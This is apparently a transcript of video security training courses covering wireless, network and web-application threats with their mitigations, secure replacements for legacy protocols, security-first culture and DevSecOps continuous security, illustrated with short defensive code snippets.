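            print(f"Possible ARP spoofing: {mac_address} claims {sorted(ips)}")

Switch features such as dynamic ARP inspection work on the same principle at the network level.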
Threats, Vulnerabilities, and Mitigation
[Video description begins] Topic title: Threats, Vulnerabilities, and Mitigation. The
presenter is Ashish Chugh. Threats and Mitigation - Wireless. [Video description
ends]
Not only do wired networks have threats and security issues; wireless networks are also prone to multiple types of threats, and there are various mitigation methods that can be used against them. Let's now look at some of these threats and how they can be mitigated. The first one is war driving. In this type of attack, the attacker simply roams around in a car, across streets and markets, trying to find an open wireless network to connect to. The mitigation could be to simply decrease the wireless range and hide the SSID. There is no guarantee that hiding the SSID will work, because there are tools that can discover even hidden SSIDs, but it can still help as a mitigation. Then there is war chalking. In this type of threat, the attacker marks the area after the SSID and its credentials become known. So once the attacker has discovered not only the SSID but also the credentials, the walls of that particular building are marked, so the attacker knows: this is where I've discovered a wireless network, and I know the credentials. The mitigation is that the credentials were discovered because you were using a weak security protocol like WEP, so you have to use WPA2.
You can also enable MAC filtering. When you enable MAC filtering, it is a simple thing: only the MAC addresses that are added to the wireless access point will be able to connect to the wireless network. You should also hide the SSID. Moving on to WEP/WPA cracking: both of these were weak security protocols, and in fact a lot of wireless routers now don't even support WEP; they support WPA onwards, which is WPA2 and newer protocols. When you talk about cracking WEP or WPA, you are basically scanning and determining the pre-shared key, which is nothing but the password that has been set for the wireless network. To mitigate this, you have to use a strong encryption protocol such as WPA2, and along with that you can also use complex passphrases so they are not easy to determine or to crack.
easy to crack. When you talk about evil twin, you just simply set up a rogue access
point for the legitimate users.
[Video description begins] For Evil Twin you set up a rogue AP for the legitimate
users to sniff the data. [Video description ends]
Now, what happens is when users find another wireless access point to which they
had been connecting, now when the users find another access point with the same
name, they're likely to get confused which is the legitimate one. So some people
will simply try the evil twin access point. And once they connect, they will provide
the username and password. And there you go, you are able to capture their
credential. How do you protect this, or how do you mitigate this threat? You simply
implement something known as Wireless Intrusion Prevention System, which is
WIPS. Then comes the rogue access point. This is an access point which is
installed without the knowledge of the IT team. Now anybody could simply bring a
wireless access point, connect it to the Ethernet network or the wired network, and
it will start broadcasting its SSID. It's as simple as that. There are ways to mitigate
that, something like enable switch port tracing. Or you could also do mode
scanning. Or you can also implement a application which is known as the rogue
detector. You can use different methods to detect a rogue access point.
Now let's look at some of the threats and mitigation methods of a network which is
a wired network. So first one is ICMP flood. In ICMP flood an attacker sends a
large number of ICMP packets to a system or a server. Which means the server or
the system is receiving so many ICMP packets in a continuation that it is unable to
respond to each and every packet. Now system attempts to do that, but as a
consequence it starts to exhaust its resources. Therefore, it is unable to handle all
the request and eventually crashes. So how do you mitigate this threat? You simply
enable the firewall to block ICMP packets on the server or the device. Then there is
a denial of service and distributed denial of service type of threats. Now denial of
service is from one system to another system.
[Video description begins] DoS/DDos threat puts a system or network to a halt
after saturating its resources. [Video description ends]
But when you talk about distributed denial of service, it has hundreds or maybe
thousands of systems focusing on one single server or a system, and sending lot of
packets at the same time. Now because when you talk about one-to-one, there is
only limited number of packets that will come. But when you talk about distributed
denial of service, then there are thousands of nodes sending the request to a single
node. Which means the power of that particular attack has multiplied by few
thousand times. And the server is unable to take that much load, and eventually
crashes. So how do you mitigate this? First, you baseline your network traffic. You
see what is the normal traffic pattern and keep monitoring your network traffic to
ensure that this pattern is not deviated from. And if there is a deviation which is
alarming, then you know there is something that is not right.
You can also compare signatures of the incoming traffic. So there are applications
and there are hardware devices which can help you map the signature of the
incoming traffic. And once you know if it is not a common signature, it is
unidentified signature, that means there is something wrong. So you can block that
traffic. And now there are anti-DoS and anti-DDoS devices that are available in the
market which are designed to protect your network or servers from these type of
threats. Then you can buy that device, implement it on the network, and you will be
able to protect your network or the server. Then comes the Fraggle threat in which
attacker sends spoofed UDP packets to a specific broadcast address of a system, or
a server, or a device. Now how do you mitigate this threat?
You simply disable the IP broadcast on the network and also enable the firewall to
block ICMP packets. Then there is buffer overflow, in which there is a malicious
code in an application which puts more data in the buffer that it can handle. So
when the buffer is filled, it is not able to cater to any of the requests on the system,
and eventually it causes the application to crash. So how do you mitigate that? You
have to detect vulnerabilities in the code. Because if there is a vulnerability in the
code, an attacker could have embedded something in the code which would have
caused the buffer overflow. Now let's look at the threats and mitigation methods of
web applications. So first one is injection.
Now in this, an attacker injects malicious code or a script into the web application's
code. And this is because the web applications have vulnerabilities, and they are
not sanitized, or the data being input is not validated properly. So the attacker can
simply embed some data into a field and inject something that is not safe for the
web application. Now when malicious code or script is embedded into the web
application, it can trigger lot of unexpected actions which the application is not
designed to handle. So you have to perform server-side validation in which any
data that is being triggered from the web application and going to the backend, it
must be checked through server-side validation. And also when a user is inputting
something into a field, you have to validate that and then sanitize if required. So for
instance, when you talk about validation, now if there is a telephone field where
you are expected the user to input a telephone number.
This particular field should not accept any characters other than numbers. So if
the user types any other character and the form accepts it, that means the input
has not been validated. If it were being validated, the user would be prompted
with a message like, "This is not the correct input. You have to input numbers
only." Then there is sanitization of the input data. For instance, if you are
expecting the user to enter everything in capital letters and the user enters
something in lowercase, you can sanitize that input and convert the lowercase to
uppercase. This is just one example; there are many other things that can be
sanitized.
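As a rough illustration of the validation and sanitization just described, here is a minimal Python sketch (the field rules and function names are hypothetical; real web frameworks provide their own validator APIs):

import re

def validate_phone(value):
    # Accept digits only, 7 to 15 characters; reject anything else.
    if not re.fullmatch(r"\d{7,15}", value):
        raise ValueError("This is not the correct input. You have to input numbers only.")
    return value

def sanitize_code(value):
    # Example sanitization: strip surrounding whitespace and force uppercase.
    return value.strip().upper()

print(validate_phone("14165550199"))   # passes validation
print(sanitize_code("  ab12cd  "))     # "AB12CD"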
Let's talk about broken authentication. This is basically when an attacker brute
forces an application or a web page to gain access to user credentials.
Passwords are usually the output of these attacks: once the passwords are
gained, the attacker is able to use them, along with the user credentials, to
get into the application. How do you mitigate that? You can implement
multi-factor authentication, which means the user not only has to provide the
password, but you also send a one-time password to the user. So along with the
permanent password, there is a one-time password which has, say, a 15-minute
validity.
The user has to provide the OTP along with the password, and unless both of
these match on the backend, the user is not granted access to the application.
And of course, beyond simply requiring a password, you have to ensure that you
enforce complex passwords. Users should not be using simple passwords such as
password12345. So you have to make sure users are forced to use complex
passwords. You can put a password policy on the domain controller, or implement
password policies using your LDAP directory. Once the password policies are
implemented, users will be forced to use complex passwords.
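A minimal sketch of the one-time password idea, assuming an in-memory store and a 15-minute validity window (production systems would normally use a TOTP library and persistent, server-side storage):

import secrets, time

OTP_TTL_SECONDS = 15 * 60
issued = {}  # user -> (otp, issue_time); in-memory for illustration only

def issue_otp(user):
    otp = f"{secrets.randbelow(10**6):06d}"  # 6-digit code
    issued[user] = (otp, time.time())
    return otp  # would be delivered out of band (SMS, email, authenticator app)

def verify_otp(user, candidate):
    otp, ts = issued.get(user, (None, 0))
    within_window = (time.time() - ts) <= OTP_TTL_SECONDS
    return within_window and secrets.compare_digest(candidate, otp or "")

code = issue_otp("alice")
print(verify_otp("alice", code))   # True while the 15-minute window is open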
Now let's move on to sensitive data exposure. This happens when either the
encryption keys are stolen, which means your private key is compromised, or
there is a man-in-the-middle attack on a transmission of information that was
being done in cleartext. These are just two examples of how sensitive data can
be exposed, but there are various other ways, for instance giving incorrect
access to somebody who doesn't need that particular access on a web server or a
file server. How do you mitigate this kind of threat? You should avoid storing
sensitive data out in the open. Your sensitive data should not be lying around
on some file server or web server; it has to be secured. If it does not require
regular access, then you should back it up and store it in a safe area. And if
it requires regular access by only a few individuals, then ensure that only
those individuals have the appropriate access.
When you are sending data from one end to the other, meaning from one device to
another device, especially over the Internet, you need to make sure that you
encrypt your data. Data sent in cleartext can easily be intercepted by any third
party who is watching your traffic. You should also disable caching, because
caches can store large amounts of data; if somebody gets their hands on the
cache of a particular web server or other server, that person may be able to
retrieve not only data but also user credentials from the cache.
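As one possible way to keep sensitive data encrypted before it is stored or transmitted, here is a minimal sketch using the third-party cryptography package (assumed installed; key handling is simplified purely for illustration):

from cryptography.fernet import Fernet

key = Fernet.generate_key()   # in practice, keep the key in a secrets manager, not in code
f = Fernet(key)

token = f.encrypt(b"credit card: 4111 1111 1111 1111")
print(token)             # ciphertext, safe to store or transmit
print(f.decrypt(token))  # original bytes, recoverable only with the key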
Now when you talk about security misconfigurations, this is one of the most
common mistakes made by web server administrators. They tend not only to give
out access to individuals who don't require it, but also to add services which
are not supposed to be running on that particular web server.
For instance, even if there is no use for FTP, an administrator might configure
FTP alongside HTTP. That is not required, so why configure it? Even though there
is no data on it, that service can still be exploited. In brief, security
misconfiguration attacks often target user accounts, meaning attackers use the
default accounts that exist on a system, or the default configuration. For
instance, you have just implemented a web server and it has a lot of services
running which you don't require. If you don't require them, the best thing is to
shut them down. And of course, it is not only the web server that can cause this
kind of threat. You have to ensure the operating system on which the web server
is running is hardened, that it does not run unnecessary services, and that it
does not have open ports which are not required. This type of mitigation has to
come from the bottom up: first you ensure that your operating system is secured,
then you ensure that your web server is secured, and then you move on to the web
application being hosted and ensure that it is also secured. All three
components must be secured.
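As a simple illustration of checking for services that should not be running, here is a minimal sketch that probes a few well-known ports (the host and the port list are hypothetical; a full audit would use a dedicated scanner such as nmap):

import socket

UNNECESSARY_PORTS = {21: "FTP", 23: "Telnet", 3389: "RDP"}
HOST = "127.0.0.1"  # replace with the server you are auditing

def is_open(host, port, timeout=1.0):
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        return s.connect_ex((host, port)) == 0  # 0 means the port accepted a connection

for port, name in UNNECESSARY_PORTS.items():
    if is_open(HOST, port):
        print(f"{name} (port {port}) is listening and should be disabled if not required")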
Weak Protocols and Their Replacements
[Video description begins] Topic title: Weak Protocols and Their Replacements.
The presenter is Ashish Chugh. [Video description ends]
Let's now look at some of the weak networking protocols and their replacements.
The first one is Telnet. A little while back we discussed that Telnet is a
protocol that establishes a session with a remote host but sends the information
in cleartext, so anybody can intercept it. Its replacement is SSH, which creates
an encrypted tunnel and encrypts the information being sent from one host to the
other. Then comes rsh, which is prone to eavesdropping and credential-stealing
attacks. Again, the replacement for this protocol is SSH.

Moving on to rcp, which was used for copying files from one host to another: one
host is your system, say, and the other is the remote host, and you would use
the rcp command to copy files to and from that server. This, again, had the same
problem, because the information was sent in cleartext, and SSH is, again, the
replacement. Then comes the rlogin protocol, which is mainly used on UNIX and
works in a similar fashion to Telnet. Both have the same problem of sending
information in cleartext, so SSH comes in as the replacement. Finally, you come
to FTP, the File Transfer Protocol. A little while back, we discussed that FTP
is prone to different types of security issues, such as FTP brute force attacks,
anonymous authentication, and directory traversal attacks. Therefore, FTP is not
a safe protocol to use when you're sending confidential or sensitive information
over the Internet.

The best option is to use secure FTP, which encrypts the information; it is a
bundle of FTP plus TLS. Then we come to HTTP. HTTP is fine for static sites
which do not have to manipulate data or use dynamic data generation. For
instance, if you're doing a search on such a site, it is not going back to a
database and fetching information. But if you are using HTTP with any site that
handles monetary transactions, or handles data which has to be queried, then it
is the wrong protocol to use, because it sends information in cleartext, which
can be easily intercepted.
To give you an example, suppose you have hosted a website which contains a login
page, and this website is served over the HTTP protocol. When you enter the
username and password, somebody sitting on your network, or somebody who can
access your transmission, can easily use a tool like Wireshark to intercept the
data and figure out the username and password, because it will be captured in
exactly the same form in which you logged in to the website. For example, say
your username is admin and your password is password.
The Wireshark application will capture this information, and the attacker will
easily be able to see what your user credentials are. As a replacement, you can
use HTTPS, which is HTTP plus TLS, the Transport Layer Security protocol. When
you use the same application with HTTPS, the information is encrypted and
therefore is not visible when somebody intercepts the data flowing out of the
web application. SNMP was known for many vulnerabilities.
Most of those vulnerabilities have been addressed in the latest version, which
is SNMPv3. More enhancements keep being made to this protocol, but SNMPv3 is the
most widely used. Then you come to IMAP. There is now a newer option, which is
IMAP over SSL or TLS. SSL itself should no longer be used, because it has been
broken multiple times, so it is best to use IMAP over TLS. Similarly, POP3 can
also be used with TLS or SSL. As I just said, SSL has been broken many times,
which means people have been able to break it and capture data from
transmissions that were using it. The best thing to do is to use TLS.
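To show what moving off plain FTP can look like in practice, here is a minimal sketch of an FTPS upload using Python's standard library (the host, credentials, and file name are hypothetical):

from ftplib import FTP_TLS

ftps = FTP_TLS("ftp.example.com")
ftps.login("uploader", "s3cret")   # credentials now travel over TLS, not in cleartext
ftps.prot_p()                      # switch the data channel to TLS as well
with open("report.csv", "rb") as fh:
    ftps.storbinary("STOR report.csv", fh)
ftps.quit()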
Types of Security Protocols
[Video description begins] Topic title: Types of Security Protocols. The presenter is
Ashish Chugh. [Video description ends]
Let's now look at various types of security protocols. Before we do that, let's
look at some features of security protocols. First of all, any security protocol
you talk about does not work on its own; it has to work with an underlying
protocol. Take the example of HTTPS: HTTPS does not work on its own, it uses
HTTP as the underlying protocol. If you talk about FTPS, FTP is the underlying
protocol, and SFTP runs over SSH. So there has to be a protocol with which the
security protocol is bundled. Then, one of the main reasons for using a security
protocol is to ensure the data is protected, and that is done by ensuring the
security protocol provides the integrity and confidentiality of the data.

Depending on which one you use, it can either do both, or it might provide just
one of these properties, either integrity or confidentiality; it depends on the
type of security protocol you use. In many cases, it can also secure the
delivery of information: if you take a protocol like IPsec or SSH, it encrypts
the information before sending it to the recipient, so the information is
secured in transit. And of course, not all security protocols are the same in
nature: some are used with messaging, some with web applications, and some for
host-to-host communication. You will look at some of these going ahead. The
first one to look at is IPsec, which is IP Security. It encrypts the
communication between two hosts to ensure integrity and confidentiality. Then
you have Transport Layer Security, TLS, which is mainly used with web
applications to ensure data is encrypted between the web server and the client.
OpenPGP is one of the standards for email encryption; it ensures the privacy and
integrity of messages. When you talk about Secure Shell, SSH, we discussed a
while back how it creates an encrypted channel between your system and the
remote host to which you want to connect, and then allows you to send
information. Since the channel is encrypted, it is not possible to intercept it
with a man-in-the-middle attack, and nobody else can sniff that traffic. Then
you have Secure/Multipurpose Internet Mail Extensions, known as S/MIME, which
uses public key encryption and signs the MIME data; it is mainly used for
encrypting emails. Then we have Domain Name System Security Extensions, commonly
known as DNSSEC, which is used to protect caching resolvers and stops the
manipulation of DNS data through cache poisoning. Then we move on to the Secure
Real-time Transport Protocol, known as SRTP, which is used for packet encryption
and also protects against replay attacks. Moving on, we have NTPsec, a
security-hardened implementation of the Network Time Protocol. Then we have File
Transfer Protocol Secure, known as FTPS, which essentially bundles TLS with FTP.
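As an illustration of TLS in action, here is a minimal sketch that opens a certificate-verified TLS connection using Python's standard library (the host shown is only an example):

import socket, ssl

context = ssl.create_default_context()   # verifies the server certificate and hostname
with socket.create_connection(("www.example.com", 443)) as raw:
    with context.wrap_socket(raw, server_hostname="www.example.com") as tls:
        print(tls.version())             # e.g. 'TLSv1.3'
        tls.sendall(b"GET / HTTP/1.1\r\nHost: www.example.com\r\nConnection: close\r\n\r\n")
        print(tls.recv(200))             # the response travelled over an encrypted channel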
Uses of Security Protocols
[Video description begins] Topic title: Uses of Security Protocols. The presenter is
Ashish Chugh. [Video description ends]
Let's now look at some of the uses of security protocols. In totality, most of
these security protocols are designed to protect information in whichever way
possible: they could be protecting integrity or confidentiality, or they could
be encrypting information to protect data in transit or data at rest. It depends
on which security protocol you are using and how you're using it. One of the
biggest uses is that when you are sending information over the Internet in
particular, you have to ensure that the information is encrypted, and you can
use a security protocol to do that. Along with that, when data is at rest, which
means it is in storage on a server, that data also has to be encrypted.
Information needs to be protected at all costs, and that is where security
protocols come in. You have to encrypt the information, whether it is at rest or
in transit. And the reason you encrypt the information is that you want to
ensure the integrity and the confidentiality of the data.
You do not want anybody who is not authorized to access that information.
Security protocols also help you secure application-level data transport, which
means that if data is flowing out of an application, it needs to be secured; you
build a mechanism like TLS into the application to ensure the data is encrypted.
They also help you perform entity authentication, so anybody who is connecting
or attempting to connect to a particular host or server can be authenticated
with the help of a security protocol. And of course, if your data is encrypted
and secured, you can prevent unauthorized access to it. Some examples of
security protocols are Secure File Transfer Protocol (SFTP), Secure Hypertext
Transfer Protocol (HTTPS), and Secure Sockets Layer (SSL).
Importance of Security Protocols
[Video description begins] Topic title: Importance of Security Protocols. The
presenter is Ashish Chugh. [Video description ends]
Let's now learn about the importance of security protocols. Security protocols
help you prevent the loss of data integrity. Take the example of OpenPGP or
S/MIME, which help you encrypt emails. Imagine those emails were carrying
confidential data while in transit: if they were not encrypted, they could have
been sniffed by anybody with access to the network, or by anyone watching them
flow over the Internet. Think about it, you could lose all your confidential and
sensitive data. With the help of security protocols, you can prevent that loss.

Similarly, if you're using a security protocol to keep data secure, you are
allowing only the limited number of users who have access to that particular
data to access it. If a user does not have access to a particular folder on the
network, they will not be able to access it, because you can simply encrypt the
data and allow access only to a few individuals.
Users who do not have access will not be able to see it. A simple example: you
encrypt your own laptop using BitLocker. Once it is encrypted, unless and until
you know the password and hold the decryption or recovery key, nobody else can
access that data. You are protecting not only the confidentiality of the data
but also its integrity. And because you are able to protect data integrity and
confidentiality, you are also protecting against data breaches and theft.
Let's assume your system is encrypted, your laptop is encrypted. Now if somebody
steals your laptop, what happens? It is gone with all the information on it, but
you need not worry as much, because the information is encrypted. It most likely
won't be possible for that person to break the encryption and recover the data.
And of course, with the use of TLS in web applications, you can prevent attacks
like man-in-the-middle and sniffing. When you're using HTTP and somebody enters
their user credentials on the login page, anybody can sniff that. And if you're
making a transaction while the web application is still on HTTP, anybody can
perform a man-in-the-middle (MITM) attack. If you use HTTPS, both of these types
of attacks can be prevented.

Data at rest is data in storage; data in transit is data going from your system
to a remote host, whether on the Internet or the intranet. You need not worry as
much when the data is in transit on the intranet, but on the Internet you
definitely do not want to send information in cleartext. If you are doing that,
you are just inviting trouble. Therefore, it is always best to use a security
protocol to encrypt that information before sending it. For instance, you can
use SSH to create an encrypted channel and send the data, and to secure
communication between two devices. Or you could use IPsec to create encrypted
tunnels between two hosts, one of which could be yours and one the remote host.
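A minimal sketch of running a command over an encrypted SSH channel, using the third-party paramiko package (assumed installed; the host and credentials are hypothetical, and host key verification is relaxed here purely for illustration):

import paramiko

client = paramiko.SSHClient()
# AutoAddPolicy skips strict host key checking; verify host keys properly in production.
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect("remote.example.com", username="admin", password="s3cret")

stdin, stdout, stderr = client.exec_command("uptime")
print(stdout.read().decode())   # the command and its output travelled through the encrypted channel
client.close()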
The Security-First Mindset
[Video description begins] Topic title: The Security-First Mindset. The presenter is
Ashish Chugh. [Video description ends]
A little earlier, we talked about security protocols: why they should be used,
what their features are, and what their benefits are. Now, before we even get to
security protocols and their implementations, we need something called a
security-first mindset. What is this security-first mindset all about? First, it
unifies security and compliance, which means it not only helps you implement
security, but also ensures your devices, your network, and your infrastructure
are compliant with the security you have implemented. For instance, you might be
pursuing PCI DSS certification, which is a compliance framework.
If you do not implement enough security and ensure that your devices and your
infrastructure are compliant, you will never get that certification, or you will
never be able to comply with PCI DSS. Therefore, you have to ensure security and
compliance are unified. A security-first mindset also strengthens the security
posture, because if you're not talking about security, if you are not thinking
about security in your organization, then there is no way security will become a
critical priority for your organization. And if that is missing, the security
posture will be weak, because security becomes just one of those things you have
to do. That is not what a security-first mindset is about. It encourages
everyone to play a key role: everybody, right from senior management to the last
employee in the hierarchy, has to think from a security perspective.
The roles people play in the organization will vary, so the responsibilities
they have in a security-first mindset will differ. For instance, a user lower in
the hierarchy will have to comply with certain rules and regulations, whereas
senior management has a critical role to play when implementing a security-first
mindset. They not only have to make strategic decisions, but they also have to
set an example for the other users. They have to think from a security
perspective, and they have to ensure that security is the highest priority for
everybody in the organization.

When security is your first and highest priority, you can be sure it will keep
your business running safely. Given today's environment on the Internet, there
are thousands of malware variants being created every day. New hackers keep
coming in, and there are people who are not only hungry for information but
hungry to steal that information and sell it on the black market, known as the
underground web or dark web. Therefore, to ensure that everybody is sensitive
about security, you have to ensure that it drills down from top to bottom. With
this approach, it will keep your business running safely.
You will also have to bring innovation to keeping information safe; you cannot
live with outdated security infrastructure. There is new malware coming, and
there are new threats coming up every day, so you will have to keep evolving
your infrastructure. You have to be innovative. Only by thinking like a hacker
can you tackle a hacker; if you're two steps behind the hacker, there is no way
you can keep your information safe. So what does a security-first mindset
require? It has to be integrated with multiple components of your organization.
It has to start with your business vision and mission: while they focus on the
business of the organization, they also have to address the security problem.
If your organization wants to grow and ensure data safety, it has to start
aligning its business vision and mission with security.
Then come the people. People are the most critical point in the security chain,
and they are also the weakest point in the security chain. Therefore, people
have to be trained properly in the security domain. They have to be made aware
of the basic level of threats and how to mitigate them. And the training that
you provide to users cannot be a one-time effort; it has to be ongoing, so that
whenever there is a change in the security posture of your organization, you
ensure users are trained. Then come the processes and procedures. Many
organizations do not align their processes and procedures with security.

You have to ensure that any process or procedure running in your organization is
looked at from a security point of view. For instance, suppose your client
requires confidential data to be uploaded to an FTP server. If your process
allows you to upload that data and security is not considered when doing so,
anything can happen: anybody could hack the FTP server and take away the data.
So one process or procedure could be that you will not use plain FTP; there is
an in-house FTPS server that has been implemented, and you use that to upload
the data. Now you have ensured that processes and procedures are aligned with
security. You also have to consider not only your own organization but also the
partners you're dealing with. If your partners are not equipped with enough
security and they are connecting to your network, be assured that sooner or
later hackers are going to reach your network as well. It will not be your
fault, but it will be the partner who has invited the trouble.
Then there are your various organizational units. Every organization has
multiple organizational units, and each one may have different security problems
and different security needs. You have to ensure those are addressed. Your
marketing and sales teams also have to be kept up to date with the latest
security posture and appraised of what is going on within the organization as
far as security is concerned. In totality, you have then covered most aspects of
the organization, and if you integrate all of them with security, you are
talking about the security-first mindset. But how do you implement a
security-first mindset?
[Video description begins] Security-first Mindset - How? [Video description ends]
The biggest question is how, and the easiest answer is to make sure your
security decisions are taken early on. For every project you do, every new
process you implement, and every change you make to the infrastructure, make
sure you consider security. You have to ensure security is integrated into any
decision-making. It cannot be that you set up a new network without thinking of
security, and only after implementing the network start asking how to secure it.
That is not going to work.

First you have to think about the security, then you implement the network;
that way you are able to make the right decision at the right time. You also
have to ensure security is tightly integrated into your business. Unlike in the
good old era, security cannot be isolated anymore; it cannot run in silos. Your
business has to integrate security tightly, which means your top management or
senior leadership has to start talking about security if they want to secure the
business and its information. It is also important, even if you are not required
to opt for a compliance program, to align your security policies with a
compliance program, even if you don't go and get yourself certified. Being
compliant is always good, because your partners, your vendors, and your clients
will have more trust in you if you have complied with a security standard. It
could be PCI DSS if you handle credit card transactions, or it could be as
generic as ISO 27001. Depending on your requirements, make sure you have
compliance implemented within your organization.
Course Summary
[Video description begins] Topic title: Course Summary. [Video description ends]
In this course, our goal was to identify the importance of security protocols
and to learn how they play a key role in network security. We did this by
covering the common protocols and their security vulnerabilities. We also looked
at the risks around certain networking protocols and at security protocols as
replacements for the legacy ones. Moving on, we looked at security protocols and
their usages. Finally, we looked at the importance of a security-first mindset.
In our next course, we will move on to explore hardened security topologies and
their importance.
Information Security: Continual
Infrastructure Testing
Discover DevOps practices such as continuous security and security monitoring,
the benefits of using DevOps, and best practices of DevOps security in this
11-video course. Explore the secure DevOps lifecycle and learn about security
risks and the various tools used for DevOps testing. Key concepts covered in
this course include continuous security practices and the need for continuous
security in a DevOps environment; the benefits of using DevOps, including
improved quality, saving money, and saving time by not having to integrate code
at a later stage; and the components of DevOps and their impact on
infrastructure security. Next, learners will examine the best practices of
DevOps security and learn the secure DevOps lifecycle, as well as the security
risks that come with DevOps and the tools that can help aid continuous security
infrastructure testing. Finally, learn the security risks of DevOps and the
various tools used for DevOps testing, as each stage of DevOps uses certain
types of tools.
Course Overview
[Video description begins] Topic title: Course Overview. Your host for this session
is Ashish Chugh, an IT Consultant. [Video description ends]
Ashish has 25 years of experience in IT infrastructure operations, software
development, cybersecurity, and e-learning. In the past, he has worked as a
quality assurance team leader, technical specialist, IT operations manager,
Associate Vice President of Software Development, Deputy Director, and Delivery
Head of Software Development.

He is currently working as an IT and cybersecurity consultant. With a Bachelor's
degree in Psychology and a Diploma in System Management, Ashish has expertise in
IT operations and process management. Ashish holds various certifications,
including Certified Network Defender, Certified Ethical Hacker, Computer Hacking
Forensic Investigator, MCSC, MCB, and CLP.
In this course, you will learn about the concept of continuous security practices.
You will also learn how continuous security has become more important with the
popularity of DevOps. This course will also cover key components of DevOps and
their impact on infrastructure security. This course will also help you identify
some of the security risks that come with DevOps and the tools that can aid
continuous security infrastructure testing.
Continuous Security Practices Introduction
[Video description begins] Topic title: Continuous Security Practices Introduction.
The presenter is Ashish Chugh. [Video description ends]
DevOps, the problem. One of the fundamental problems with DevOps is that
development happens at a very fast pace, and due to this there is a continuous
push of code into a central repository. Because this continuous push of code is
happening, no security testing happens on that code, and that is because there
is no synchronization with the security team. The security team is kept out
until the last stage before deployment. The security team does not know what is
being pushed into the existing code, and the DevOps team has the fundamental
constraint of developing at a very fast pace, due to which they keep pushing
code into the existing code and continue with development.

Once the development is done, then the security team gets involved. However,
remember that this is the last stage before the final deployment into
production. If the security team finds a lot of bugs or security loopholes at
this stage, there is a lot of rework that needs to be done. Another fundamental
problem with DevOps is that the security team is not as agile as the development
team. This is because the security team has set norms against which it checks
the code, which is not acceptable to the DevOps team in most cases, because the
testing time can also delay the development time.
[Video description begins] DevSecOps - The Solution. [Video description ends]
On the previous slide, we looked at the problems with DevOps. Now, how do you
overcome them? You have something called DevSecOps, which is DevOps plus
security. The solution to the DevOps problems is to integrate security into
every build that is getting checked in to the centralized repository. The
security team needs to be involved in every release that comes from the DevOps
teams; they should be checking each and every build. Whether that happens on a
daily basis or on alternate days does not matter, but every build and every
release needs to be checked by the security team.

The security team can perform different levels of testing. It could be static
code review, dynamic security tests, software composition analysis, platform
vulnerability analysis, or analysis of the existing code, such as a
vulnerability assessment. It could be anything else as well; as long as there
are levels of testing happening on every piece of code, the DevSecOps solution
can work. So what is continuous security? Continuous security is the integration
of security tools into continuous development. Why would you want to do that?
Because at every release and every build, you want to ensure that whatever is
being released or built is safe for rollout, safe to go into the production
environment, with no vulnerabilities and no security loopholes left in the
application.
You also want to do penetration testing at periodic intervals. Penetration
testing is not something you can do once and never again; you need to perform it
at multiple intervals to ensure that every piece of code getting into the
application is safe and secure. You also want to integrate automated security
tools into DevOps development. You want to automate them to ensure there is less
manual work and more automated testing, so that the security team is free to do
many more tasks than just sitting and testing the application.

Continuous security needs to be automated, autonomous, integrated, scalable, and
repeatable. Take the example of repeatable: if one type of testing has already
been done on the application and you need to repeat it, you should not have to
redo everything to rerun that testing; the test itself should be repeatable. Now
look at the broad-level DevOps lifecycle: there is an idea, which is planning,
then design, then coding, then testing, and then deployment. In that broad-level
DevOps lifecycle, there is nothing that explicitly deals with security. With
continuous security, you embed security at every point that is necessary.
For instance, between idea and design you would do a risk assessment: you would
look at what risks are possible. After the design, you want to do a design
review to ensure the design is appropriate and meets the security requirements.
After coding, you want to do a code review, which could be a static code review
or an automated code review, to find out where the security flaws are and
whether the coding has been done as per the standards defined by the
organization. And before you deploy the application, you want to do penetration
testing, which gives you insight into the security loopholes present in the
application.
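As one way to wire an automated code review step into the pipeline, here is a minimal sketch that invokes a static analyser from a build script; bandit is used only as an example tool and is assumed to be installed, and the repository path is hypothetical:

import subprocess, sys

result = subprocess.run(
    ["bandit", "-r", "src/", "-ll"],   # recursive scan, report medium severity and above
    capture_output=True, text=True,
)
print(result.stdout)
if result.returncode != 0:
    # Fail the build so code with flagged issues never reaches deployment.
    sys.exit("Static security analysis found issues; blocking the release.")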
[Video description begins] Continuous Security Practices. [Video description ends]
There are certain continuous security practices that you should follow. This is
not an exhaustive list, but these are some of the key guidelines. For instance,
implement security governance policies: your organization must have security
governance in place. If that is missing, it is very difficult to integrate
continuous security, because governance defines how things should run and what
you need to watch out for. You also need to embed security into the DevOps
lifecycle.

Later in the course, we'll also see how security is embedded into DevOps. You
need to ensure there is ongoing vulnerability assessment of the application. You
need to automate as much as possible and reduce human intervention. Remember:
more human intervention means more errors; less human intervention and more
automation means fewer errors. You also need to run security tests at every
given point, see the results, and fix the code and the application based on the
output of those tests. You also need to segment the DevOps network; it should be
completely segregated from the production network. They do not need to be on the
same network.

Remember, there are things the DevOps team will be doing which probably are not
suitable for the rest of the network. They will have their code, their login
credentials, everything in a central repository, and you do not want any other
employee to mishandle that code and those credentials. You also need to ensure
that developers are given a minimum set of privileges. Not everybody needs root
or admin access; give them the bare minimum privileges required to work, nothing
more than that.
Continuous Security in DevOps Environment
[Video description begins] Topic title: Continuous Security in DevOps
Environment. The presenter is Ashish Chugh. [Video description ends]
Continuous security in a DevOps environment. The reason you want to integrate
continuous security into a DevOps environment is to ensure the confidentiality,
integrity, and availability of information. You do not want the application to
be breached and the information lost or stolen by a hacker. Therefore, you have
to ensure that confidentiality, integrity, and availability are integrated
tightly into the application.

You also need to include accountability, which is about verifying who has what
level of access and who has done what on the network. Integrate tighter security
into the network: make sure you have enough security devices in place and that
the network is properly protected. You also need to ensure that information is
protected in all aspects. If you protect the CIA triad, then you are able to
protect the information from all corners.
[Video description begins] Designing Goals for Continuous Security. [Video
description ends]
Confidentiality means that information should be accessed only by authorized
persons; if information is accessed by an unauthorized person, it has lost its
confidentiality. Integrity implies ensuring the accuracy, reliability, and
completeness of information. Availability implies providing access to
information as and when it is requested or required. Accountability implies
verifying who has accessed the information and who has done what with the
application.
Importance of Continuous Security
[Video description begins] Topic title: Importance of Continuous Security. The
presenter is Ashish Chugh. [Video description ends]
Importance of continuous security. Most often, when developers develop an
application, security is not the end goal. However, when you bring continuous
security into the picture, you need to ensure there is end-to-end security for
the application. Right from the planning stage to the deployment stage, you need
enough security checks in place to ensure the application has no security
loopholes. With the integration of continuous security, because you are testing
the application at every stage, every build, and every release, you reduce the
number of security loopholes, which eventually leads to a reduction in the
number of security breaches. And because there are fewer errors in the
application, it also lowers the cost of development and fixing; you are able to
do the right thing on the first attempt. Imagine a scenario where you launch an
application without continuous security integration. The application gets rolled
out, but there are enough errors in it to attract a hacker. The hacker is able
